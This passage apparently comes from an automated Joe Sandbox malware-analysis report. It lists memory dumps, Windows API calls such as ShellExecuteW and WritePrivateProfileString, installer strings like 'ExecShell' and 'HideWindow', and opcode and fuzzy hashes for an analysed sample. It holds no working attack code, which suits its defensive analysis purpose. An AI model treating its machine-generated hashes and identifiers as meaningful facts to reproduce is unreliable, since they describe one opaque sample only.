                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                • String ID: <RM>$TravelersDevelopingImpactsJewsInstructorOriginal$WriteINIStr: wrote [%s] %s=%s in %s
                                                • API String ID: 247603264-163489428
                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                APIs
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                • API String ID: 3156913733-2180253247
                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                • String ID: HideWindow
                                                • API String ID: 1249568736-780306582
                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                APIs
                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID:
                                                • API String ID: 3394109436-0
                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
